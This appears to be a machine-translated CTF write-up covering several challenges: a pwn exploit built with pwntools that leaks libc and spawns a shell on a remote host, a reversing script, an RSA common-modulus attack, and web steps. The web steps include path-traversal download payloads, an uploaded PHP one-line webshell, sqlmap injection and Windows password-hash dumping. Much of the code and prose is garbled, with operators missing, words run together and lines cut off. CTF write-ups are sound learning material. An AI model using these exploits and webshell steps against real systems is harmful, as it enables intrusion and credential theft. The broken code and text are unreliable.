How to analyze the writeup of CTF questions

This is a relatively simple PWN question. First, drag it to IDA and briefly look at the program. As shown in the figure

found When reading, there is no stack protection, so when reading 0x34, the game return address may be replaced, first through write(1,write,4) (game is used as the write return address). Read the write address in this way, so that you can get the system address, because it is running in a loop again. Also write /bin/sh\0 at 0x804A06C, so that the system can run.

Pythonexp is as follows:

frompwn import *

defrungameAgainPoc(p,yourname,flag):

p.recvuntil("First,what's your name? \n")

p.send(yourname "\n")

p.recvuntil("doyou want to get flag?\n")

p.send (flag)

pwnelf= ELF("./pwn")

libcelf= ELF("./libc-2.23.so")

gameadd= 0x080485CB

plt_write= pwnelf.symbols['write']

got_write= pwnelf.got['write']

#p= process('./pwn',env={ 'LD_PRELOAD':'./libc-2.23.so'})

p= remote('117.50.60.184', 12345)

rungameAgainPoc(p,"ichuqiu","0" *32 p32(plt_write)

                                                                                                                                                                                                                                                                         ##print"pwn write " ,hex(write_addr)

libcelf_system_add= libcelf.symbols["system"]

              write_addr- libcelf.symbols["write"]

print"pwn libcelf_system_add",hex(libcelf_system_add)

rungameAgainPoc(p,"/bin/sh\0","0"*32

                                                                                                                                                                   0x804A06C))

p.interactive()

flag{62c51c85-1516-4ad8-989c-58ce8c29642e}

0x02 Antidbg

IDA finds key functions , found that there is a circular comparison

Initial judgment is that it is an 8-digit number, so separate comparison

[ebp var_6C]01050D02070106010206000B07010C06
#[ebp var_4C]02080602

#[ebp var_5C]0100070D020108080D000103040D0303

#[ebp var_48]02050009

#[ebp var_44]00000D02

defcover(buf):

buf= buf.decode("hex")

rbuf= ""

fori in range(len(buf) - 1, -1,-1):

rbuf = buf[i]

returnrbuf

defcover_hex_lines(buf):

returnbuf.replace("", "").replace("\r","").replace("\n","").decode("hex")

var_6c=cover("01050D02070106010206000B07010C06")

cover("0100070D020108080D000103040D0303")

cover("02080602") cover("02050009")

cover("00000D02")

#printlen(var _6c)

byte_402178= """02 02 02 02 03 01 01 02

0101 02 01 01 00 01 01 02 02 00 01 01 01 01 00

0101 02 02 00 01 01 02 02 01 01 01 01 01 02 01

0103 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0303 0D 04 03 01 00 0D 08 08 01 0 2 0D 07 00 01

060C 01 07 0B 00 06 02 01 06 01 07 02 0D 05 01

0000 00 00 EF 28 68 5B 00 00 00 00 02 00 00 00

4800 00 00 E4 22 00 00 E4 16 00 00 00 00 00 00

EF28 68 5B 00 00 00 00 0C 00 00 00 14 00 00 00

2C23 00 00 2C 17 00 00 00 00 00 00 EF 28 68 5B

0000 00 00 0D 00 00 00 54 02 00 00 40 23 00 00

4017 00 00 00 00 00 00 EF 28 68 5B 00 00 00 0 0

0E00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

A000 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00 00 0 0 00 00 00 30 40 00

E022 40 00 01 00 00 00 E8 20 40 00 00 00 00 00

0000 00 00 00 00 00 00 00 01 00 00 00 00 00 00

0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00"""

.replace("","").replace ("\r","").replace("\n","").decode("hex")

byte_402138= """00 00 00 00 01 00 00 00

0200 00 00 03 00 00 00 04 00 00 00 05 00 00 00

0600 00 00 07 00 00 00 08 00 00 00 09 00 00 00

0A00 00 00 0B 00 00 00 0C 00 00 00 0D 00 00 00

0E00 00 00 0F 00 00 00"""

.replace("","").replace("\r","").replace("\n","").decode("hex")

dword_403018=" ""0200 00 00 02 00 00 00

0200 00 00 02 00 00 00 00 00 00 00 00 00 00 00

""".replace("","").replace ("\r","").replace("\n","").decode("hex")

#text:0040110E                 mov   ecx, [ebp var_4]

#.text:00401111                         ecx, ebp

#.text:00401113             mov dword_40301C, 3

#.text:0040111D                dword_403020, 6

#.text:00401127 mov dword_403024, 7

#The memory value has changed, so modify it

dword_403018= dword_403018[0:4] '\x03' dword_403018[5:8]

'\x06' dword_403018[9:12] '\x07'

dword_403018[13:]

printdword_403018.encode("hex")

fori in range(0 ,42):

hightnum= ord(dword_403018[ord(byte_402178[i])*4])

numbershow= hightnum ord(byte_402138[ord(var_6c[i ])*4])

printchr(numbershow),

flag{06b16a72-51cc-4310-88ab-70ab68290e22}

0x03 sqli

This question It is a sql constraint attack. The registered user name is "admin" and the password is a password that meets the regulations. Then log in and you will see flag

flag{b5a1f9c5-ac30-4e88-b460-e90bcb65bd70}

0x04 RSA

opensslrsa -inform PEM -in pubkey1.pem -pubin -text

Public-Key:(2048 bit)

Modulus:

00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:

3c:99:57:7f:89:78: 04:8d:e5:43:6b:ef:c3:0d:8d:

8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57: 30:6e:

bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:

a1:a3: f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:

c9:52:57:a1:49:a9:7f:59:54: ea:f8:93:41:14:7a:

dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:

ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:

4c:7d:9a:c4:6b: d6:b5:f3:22:b2:b5:72:8b:a1:48:

70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c: e3:e0:17:

03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:

79: b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:

ee:66:b1:5a:ff:23:3f:c7: 7b:55:8a:48:7d:a5:95:

2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:

e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:

e7:24:81:db: 25:68:aa:82:9e:ea:c8:7d:20:1a:5a:

8f:f5:ee:6f:0b:e3:81:92:ab:28:39: 63:5f:6c:66:

42:17

Exponent:2333 (0x91d)

opensslrsa -inform PEM -in pubkey2.pem -pubin -text

Public-Key:(2048 bit)

Modulus:

00:89:89:a3:98:98:84:56:b3:fe:f4:a6: ad:86:df:

3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:

8c: 94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:

bb:8d:e3:6c:2c:39:6a:84: ef:dc:5d:38:25:02:da:

a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:

c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:

dc:dd:4e:95: 0f:ff:74:e3:0b:be:62:28:76:b4:2e:

ea:c8:6d:f4:ad:97:15:d0:5b:56:04: aa:81:79:42:

4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:

70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:

03:f0:4f:94:a4:31:d9: 95:4b:d7:ae:2c:7d:d6:e8:

79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b: d9:

ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:

2f:be:2b: 92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:

e3:6a:5e:d8:2d:5c:1b:2a:eb:0e: 45:be:e4:05:cb:

e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:

8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:

42:17

Exponent:23333 (0x5b25).

It can be seen that the two public keys n are the same, but e is different. The common mode attack using RSA

Python is as follows:

fromlibnum import n2s ,s2n

fromgmpy2 import invert

importbase64

importgmpy2

defbignumber(n):

n= n.decode("hex ")

rn= 0

forb in n:

rn= rn

rn = ord(b)

returnrn

n ="""00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:

3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:

8c:94:95:89:12:aa:52 :6f:f3:33:b6:68:57:30:6e:

   bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:

   a1:a3:f3:b6:e9:75 :02:d2:e3:1c:84:93:30:f5:b4:

   c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41 :14:7a:

   dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:

   ea:c8 :6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:

   4c:7d:9a:c4:6b:d6:b5:f3:22 :b2:b5:72:8b:a1:48:

   70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:

   03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:

   79:b3:5f:8a:2d :4a:5e:fb:e7:37:25:7b:f9:9b:d9:

   ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48 :7d:a5:95:

   2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:

   e3 :6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:

   e7:24:81:db:25:68:aa:82 :9e:ea:c8:7d:20:1a:5a:

   8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66 :42:17"""

    .replace(":",").replace("",").replace("\r",").replace("\n" ,"")

##printn

n =bignumber(n)

printhex(n)

e1= 2333

e2 =23333

defegcd(a,b):

   ifa == 0:

       return(b,0,1)

   else:

       g,y,x= egcd(b%a,a)

       return(g,x - (b //a)*y,y)

flag1 = base64 .b64decode(open("flag1.enc","rb").read())

flag2 = base64.b64decode(open("flag2.enc","rb").read())

c1= s2n(flag1)

c2= s2n(flag2)

c2= invert(c2,n)

#s= egcd(e1, e2)

#prints

s =gmpy2.gcdext(e1,e2)

#prints

s1= s[1]

s2= 0 - s[2]

prints1

prints2

m =pow(c1,s1,n) * pow(c2,s2,n)% n

printn2s(m)

flag{4b0b4c8a-82f3-4d80-902b-8e7a5706f8fe} 

0x05 抛砖引玉

1.根据CMS版本，在wooyun镜像站找到漏洞细节，

网站存在注入，但是数据库用户表为空，另外发现发现文件下载漏洞，

down.php?urls=data/../config. php

下载文件发现DB_user/mvoa用户的密码

define('DB_PWD','B!hpp3Dn1.');

flag值：B!hpp3Dn1.

2.http://url/www.zip，获得网站备份文件，在config.php发现DB_user/root用户的密码

define('DB_PWD','mypasswd');

flag值：mypasswd

0x06 暗度陈仓

1.发现下载路径

/u-are-admin/download.php?dl=

显示文件找不到（u-Are-Admin/u-upload-file文件夹），发现关键目录/u-Are-Admin/

flag值：/u-Are-Admin /

2.在/u-Are-Admin/目录，可以上传文件，上传Php（大小写绕过）一句话木马，菜刀链接，netuser查看系统管理员Hack用户的全名

flag: Hacked356

3. c771f

0x07瞒 天 过 海

## 1 1awvs 扫到 注入 点

##/Cat.php? ID = 2

## SQLMAP 直接 能 ， ， 通过 即 即 获得 后台 明文 密码 ， ， ， ， ， ， ， ， ， ， ， ， ， ， serverlog

flag值：serverlog

2.注入也能获取root的密码hash，

*21C5210729A90C69019F01FED76FAD4654F27167

然后cmd5解密得rootserver

flag值：rootserver

3.内容

/classes/downloadfile .php?file=../../../../../../password.txt

flag值：c9c35cf409344312146fa7546a94d1a6

0x08 偷梁换柱

1.AWVS扫到./git源码泄露，用工具GitHack下载所有源码，在数据库文件发现用户名，密码（adminAdmin@pgsql）

flag值：Admin@pgsql

2 .掉small，即使文件真正地址，

/admin/uploads/111.php.png

# 。

3.菜刀能够直接查看/tmp/access 16位

0x09 .log的内容的前16位

0x09 ，然后getshell，构造路径为

url/info/include.php?filename=..//sjk-uploads/UareHack.txt

密码是a，拿到shell可以获取phpStudy目录下Documents.txt的内容

2.拿到shell可以获取ichunqiu用户Desktop根目录password.txt的内容

3.getshell后，传msf木马无法反弹，最后使用QuarksPwDump HASH，在线破解拿到密码

78beaa5511afa889b75e0c8d76954a50:4ffe895918a454ce0f872dad8af0b4da:::

fla g值：123qwe123

The above is the detailed content of How to analyze the writeup of CTF questions. For more information, please follow other related articles on the PHP Chinese website!